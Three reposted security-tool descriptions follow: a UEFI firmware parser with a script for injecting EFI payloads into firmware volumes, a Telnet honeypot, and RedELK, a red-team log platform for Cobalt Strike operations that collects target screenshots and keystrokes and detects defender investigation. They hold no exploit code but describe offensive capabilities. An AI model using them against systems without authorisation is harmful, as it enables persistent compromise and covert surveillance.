The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials. InstallationThis module is included within PyPy as uefi_firmware$ sudo pip install uefi_firmwareTo install from Github, checkout this repo and use:$ sudo python ./setup.py installRequirementsPython development headers, usually found in the python-dev package.The compression/decompression features will use the python headers and gcc.pefile is optional, and may be used for additional parsing. UsageThe simplest way to use the module to detect or parse firmware is through the AutoParser class.import uefi_firmwarewith open(‘/path/to/firmware.rom’, ‘r’) as fh: file_content = fh.read()parser = uefi_firmware.AutoParser(file_content)if parser.type() != ‘unknown’: firmware = parser.parse() firmware.showinfo()There are several classes within the uefi, pfs, me, and flash packages that accept file contents in their constructor. In all cases there are abstract methods implemented:process() performs parsing work and returns a True or Falseshowinfo() print a hierarchy of information about the structuredump() walk the hierarchy and write each to a file ScriptsA Python script is installed uefi-firmware-parser$ uefi-firmware-parser -husage: uefi-firmware-parser [-h] [-b] [–superbrute] [-q] [-o OUTPUT] [-O] [-c] [-e] [-g GENERATE] [–test] file [file …]Parse, and optionally output, details and data on UEFI-related firmware.positional arguments: file The file(s) to work onoptional arguments: -h, –help show this help message and exit -b, –brute The input is a blob and may contain FV headers. –superbrute The input is a blob and may contain any sort of firmware object -q, –quiet Do not show info. -o OUTPUT, –output OUTPUT Dump firmware objects to this folder. -O, –outputfolder Dump firmware objects to a folder based on filename ${FILENAME}_output/ -c, –echo Echo the filename before parsing or extracting. -e, –extract Extract all files/sections/volumes. -g GENERATE, –generate GENERATE Generate a FDF, implies extraction (volumes only) –test Test file parsing, output name/success.To test a file or directory of files:$ uefi-firmware-parser –test ~/firmware/*~/firmware/970E32_1.40: UEFIFirmwareVolume~/firmware/CO5975P.BIO: EFICapsule~/firmware/me-03.obj: IntelME~/firmware/O990-A03.exe: None~/firmware/O990-A03.exe.hdr: DellPFSIf you need to parse and extract a large number of firmware files check out the -O option to auto-generate an output folder per file. If parsing and searching for internals in a shell the –echo option will print the input filename before parsing.The firmware-type checker will decide how to best parse the file. If the –test option fails to identify the type, or calls it unknown, try to use the -b or –superbrute option. The later performs a byte-by-byte type checker.$ uefi-firmware-parser –test ~/firmware/970E32_1.40~/firmware/970E32_1.40: unknown$ uefi-firmware-parser –superbrute ~/firmware/970E32_1.40[…]FeaturesUEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsingIntel PCH Flash DescriptorsIntel ME modules parsing (ME, TXE, etc)Dell PFS (HDR) updates parsingTiano/EFI, and native LZMA (7z) [de]compressionComplete UEFI Firmware volume object hierarchy displayFirmware descriptor [re]generation using the parsed input volumesFirmware File Section injectionGUID InjectionInjection or GUID replacement (no addition/subtraction yet) can be performed on sections within a UEFI firmware file, or on UEFI firmware files within a firmware filesystem.$ python ./scripts/fv_injector.py -husage: fv_injector.py [-h] [-c] [-p] [-f] [–guid GUID] –injection INJECTION [-o OUTPUT] fileSearch a file for UEFI firmware volumes, parse and output.positional arguments: file The file to work onoptional arguments: -h, –help show this help message and exit -c, –capsule The input file is a firmware capsule. -p, –pfs The input file is a Dell PFS. -f, –ff Inject payload into firmware file. –guid GUID GUID to replace (inject). –injection INJECTION Pre-generated EFI file to inject. -o OUTPUT, –output OUTPUT Name of the output file.Note: when injecting into a firmware file the user will be prompted for which section to replace. At the moment this is not-yet-scriptable.IDA Python supportThere is an included script to generate additional GUID labels to import into IDA Python using Snare’s plugins. Using the -g LABEL the script will generate a Python dictionary-formatted output. This project will try to keep up-to-date with popular vendor GUIDs automatically.$ python ./scripts/uefi_guids.py -husage: uefi_guids.py [-h] [-c] [-b] [-d] [-g GENERATE] [-u] fileOutput GUIDs for files, optionally write GUID structure file.positional arguments: file The file to work onoptional arguments: -h, –help show this help message and exit -c, –capsule The input file is a firmware capsule, do not search. -b, –brute The input file is a blob, search for firmware volume headers. -d, –flash The input file is a flash descriptor. -g GENERATE, –generate GENERATE Generate a behemoth-style GUID output. -u, –unknowns When generating also print unknowns.Supported VendorsThis module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse, some may required a-priori decompression or extraction from the distribution update mechanism (typically a PE).ASRockDellGigabyteIntelLenovoHPMSIVMwareAppleDownload UEFI Firmware Parser

Link: http://feedproxy.google.com/~r/PentestTools/~3/vrw7ce1SeJ0/uefi-firmware-parser-parse-biosintel.html

Hontel – Telnet Honeypot

HonTel is a Honeypot for Telnet service. Basically, it is a Python v2.x application emulating the service inside the chroot environment. Originally it has been designed to be run inside the Ubuntu environment, though it could be easily adapted to run inside any Linux environment.Documentation:Setting the environment and running the application requires intermmediate Linux administration knowledge. The whole deployment process can be found “step-by-step" inside the deploy.txt file. Configuration settings can be found and modified inside the hontel.py itself. For example, authentication credentials can be changed from default root:123456 to some arbitrary values (options AUTH_USERNAME and AUTH_PASSWORD), custom Welcome message can be changed from default (option WELCOME), custom hostname (option FAKE_HOSTNAME), architecture (option FAKE_ARCHITECTURE), location of log file (inside the chroot environment) containing all telnet commands (option LOG_PATH), location of downloaded binary files dropped by connected users (option SAMPLES_DIR), etc.Note: Some botnets tend to delete the files from compromised hosts (e.g. /bin/bash) in order to harden itself from potential attempts of cleaning and/or attempts of installation coming from other (concurent) botnets. In such cases either the whole chroot environment has to be reinstalled or host directory where the chroot directory resides (e.g. /srv/chroot/) should be recovered from the previously stored backup (recommended).Download Hontel

Link: http://feedproxy.google.com/~r/PentestTools/~3/7Qv62zGn_mo/hontel-telnet-honeypot.html

RedELK – Easy Deployable Tool For Red Teams Used For Tracking And Alarming About Blue Team Activities As Well As Better Usability In Long Term Operations

Red Team’s SIEM – easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability for the Red Team in long term operations.Initial public release at BruCON 2018:Video: https://www.youtube.com/watch?v=OjtftdPts4gPresentation slides: https://github.com/outflanknl/Presentations/blob/master/MirrorOnTheWall_BruCon2018_UsingBlueTeamTechniquesinRedTeamOps_Bergman-Smeets_FINAL.pdfGoal of the projectShort: a Red Team’s SIEM.Longer: a Red Team’s SIEM that serves three goals:Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries its now possible to detect that the Blue Team is investigating your infrastructure.Out-of-the-box usable by being easy to install and deploy, as well as having ready made views, dashboards and alarms.Here’s a conceptual overview of how RedELK works.RedELK uses the typical components Filebeat (shipping), Logstash (filtering), Elasticsearch (storage) and Kibana (viewing). Rsync is used for a second syncing of teamserver data: logs, keystrokes, screenshots, etc. Nginx is used for authentication to Kibana, as well as serving the screenshots, beaconlogs, keystrokes in an easy way in the operator’s browser.A set of python scripts are used for heavy enriching of the log data, and for for Blue Team detection.Supported tech and requirementsRedELK currently supports:Cobalt Strike teamserversHAProxy for HTTP redirector data. Apache support is expected soon.Tested on Ubuntu 16 LTSRedELK requires a modification to the default haproxy configuration in order to log more details.In the ‘general’ section:log-format frontend:%f/%H/%fi:%fp\ backend:%b\ client:%ci:%cp\ GMT:%T\ useragent:%[capture.req.hdr(1)]\ body:%[capture.req.hdr(0)]\ request:%rAt ‘frontend’ section:declare capture request len 40000http-request capture req.body id 0capture request header User-Agent len 512InstallationFirst time installationAdjust ./certs/config.cnf to include the right details for the TLS certificates. Once done, run: initial-setup.sh This will create a CA, generate necessary certificates for secure communication between redirs, teamserver and elkserver and generates a SSH keypair for secure rsync authentication of the elkserver to the teamserver. It also generates teamservers.tgz, redirs.tgz and elkserver.tgz that contain the installation packages for each component. Rerunning this initial setup is not required. But if you want new certificates for a new operation, you can simply run this again.Installation of redirectorsCopy and extract redirs.tgz on your redirector as part of your red team infra deployment procedures. Run: install-redir.sh $FilebeatID $ScenarioName $IP/DNS:PORT$FilebeatID is the identifier of this redirector within filebeat.$ScenarioName is the name of the attack scenario this redirector is used for.$IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.This script will set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration and start filebeat.Installation of teamserverCopy and extract teamservers.tgz on your Cobalt Strike teamserver as part of your red team infra deployment procedures. Run: install-teamserver.sh $FilebeatID $ScenarioName $IP/DNS:PORT$FilebeatID is the identifier of this teamserver within filebeat.$ScenarioName is the name of the attack scenario this teamserver is used for.$IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.This script will warn if filebeat is already installed (important as ELK and filebeat sometimes are very picky about having equal versions), set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration, start filebeat, create a local user ‘scponly’ and limit that user to SSH key-based auth via scp/sftp/rsync.Installation of ELK serverCopy and extract elkserver.tgz on your RedELK server as part of your red team infra deployment procedures. Run: install-teamserver.sh This script will set the timezone (default Europe/Amsterdam), install logstash, elasticsearch, kibana and dependencies, install required certificates, deploy the logstash configuration and required custom ruby enrichment scripts, download GeoIP databases, install Nginx, configure Nginx, create a local user ‘redelk’ with the earlier generated SSH keys, install the script for rsyncing of remote logs on teamservers, install the script used for creating of thumbnails of screenshots, install the RedELK configuration files, install crontab file for RedELK tasks, install GeoIP elasticsearch plugins and adjust the template, install the python enrichment scripts, and finally install the python blue team detection scripts.You are not done yet. You need to manually enter the details of your teamservers in /etc/cron.d/redelk, as well as tune the config files in /etc/redelk (see section below).Setting up enrichment and detectionOn the ELK server in the /etc/redelk directory you can find several files that you can use to tune your RedELK instance for better enrichments and better alarms. These files are:/etc/redelk/iplist_customer.conf : public IP addresses of your target, one per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index./etc/redelk/iplist_redteam.conf : public IP addresses of your red team, one per line. Convenient for identifying testing done by red team members. Including an address here will set a tag for applicable records in the redirhaproxy-* index./etc/redelk/iplist_unknown.conf : public IP addresses of gateways that you are not sure about yet, but don’t want to be warned about again. One per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index./etc/redelk/known_sandboxes.conf : beacon characteristics of known AV sandbox systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index./etc/redelk/known_testsystems.conf : beacon characteristics of known test systems. One per line. Including data here here will set a tag for applicable records in the rtops-* index./etc/redelk/alarm.json.config: details required for alarms to work. This includes API keys for online services (Virus Total, IBM X-Force, etc) as well as the SMTP details required for sending alarms via e-mail.If you alter these files prior to your initial setup, these changes will be included in the .tgz packages and can be used for future installations. These files can be found in ./RedELK/elkserver/etc/redelk.To change the authentication onto Nginx, change /etc/nginx/htpasswd.users to include your preferred credentials. Or ./RedELK/elkserver/etc/nginx/htpasswd.users prior to initial setup.Under the hoodIf you want to take a look under the hood on the ELK server, take a look at the redelk cron file in /etc/cron.d/redelk. It starts several scripts in /usr/share/redelk/bin/. Some scripts are for enrichment, others are for alarming. The configuration of these scripts is done with the config files in /etc/redelk/. There is also heavy enrichment done (including the generation of hyperlinks for screenshots, etc) in logstash. You can check that out directly form the logstash config files in /etc/logstash/conf.d/.Current state and features on todo-listThis project is still in alpha phase. This means that it works on our machines and our environment, but no extended testing is performed on different setups. This also means that naming and structure of the code is still subject to change.We are working (and you are invited to contribute) on the following features for next versions:Include the real external IP address of a beacon. As Cobalt Strike has no knowledge of the real external IP address of a beacon session, we need to get this form the traffic index. So far, we have not found a true 100% reliable way for doing this.Support for Apache redirectors. Fully tested and working filebeat and logstash configuration files that support Apache based redirectors. Possibly additional custom log configuration needed for Apache. Low priority.Solve rsyslog max log line issue. Rsyslog (default syslog service on Ubuntu) breaks long syslog lines. Depending on the CS profile you use, this can become an issue. As a result, the parsing of some of the fields are properly parsed by logstash, and thus not properly included in elasticsearch.Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there.Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies.User-agent checks. Tagging and alarming on suspicious user-agents. This will probably be divided in hardcoded stuff like curl, wget, etc connecting with the proper C2 URL’s, but also more dynamic analysis of suspicious user-agents.DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services.Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms.Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don’t want to give out all information to all visitors.UsageFirst time loginBrowse to your RedELK server’s IP address and login with the credentials from Nginx (default is redelk:redelk). You are now in a Kibana interface. You may be asked to create a default index for kibana. You can select any of the available indices, it doesn’t matter which one you pick.There are probably two things you want to do here: look at dashboards, or look and search the data in more detail. You can switch between those views using the buttons on the left bar (default Kibana functionality).DashboardsClick on the dashboard icon on the left, and you’ll be given 2 choices: Traffic and Beacon.Looking and searching data in detailClick on the Discover button to look at and search the data in more detail. Once there, click the time range you want to use and click on the ‘Open’ button to use one of the prepared searches with views.Beacon dataWhen selecting the search ‘TimelineOverview’ you are presented with an easy to use view on the data from the Cobalt Strike teamservers, a time line of beacon events if you like. The view includes the relevant columns you want to have, such as timestamp, testscenario name, username, beacon ID, hostname, OS and OS version. Finally, the full message from Cobalt Strike is shown.You can modify this search to your liking. Also, because its elasticsearch, you can search all the data in this index using the search bar.Clicking on the details of a record will show you the full details. An important field for usability is the beaconlogfile field. This field is an hyperlink, linking to the full beacon log file this record is from. Its allows you to look at the beacon transcript in a bigger windows and use CTRL+F within it.ScreenshotsRedELK comes with an easy way of looking at all the screenshots that were made from your targets. Select the ‘Screenshots’ search to get this overview. We added two big usability things: thumbnails and hyperlinks to the full pictures. The thumbnails are there to quickly scroll through and give you an immediate impression: often you still remember what the screenshot looked like.KeystrokesJust as with screenshots, its very handy to have an easy overview of all keystrokes. This search gives you the first lines of cententi, as well as again an hyperlink to the full keystrokes log file.IOC dataTo get a quick list of all IOCs, RedELK comes with an easy overview. Just use the ‘IOCs’ search to get this list. This will present all IOC data from Cobalt Strike, both from files and from services.You can quickly export this list by hitting the ‘Reporting’ button in the top bar to generate a CSV of this exact view.Logging of RedELKDuring installation all actions are logged in a log file in the current working directory.During operations, all RedELK specific logs are logged on the ELK server in /var/log/redelk. You probably only need this for troubleshooting.Authors and contributionThis project is developed and maintained by:Marc Smeets (@smeetsie on Github and @mramsmeets on Twitter).Mark Bergman (@xychix on Github and Twitter)Download RedELK

Link: http://feedproxy.google.com/~r/PentestTools/~3/v3TIGlliuHU/redelk-easy-deployable-tool-for-red.html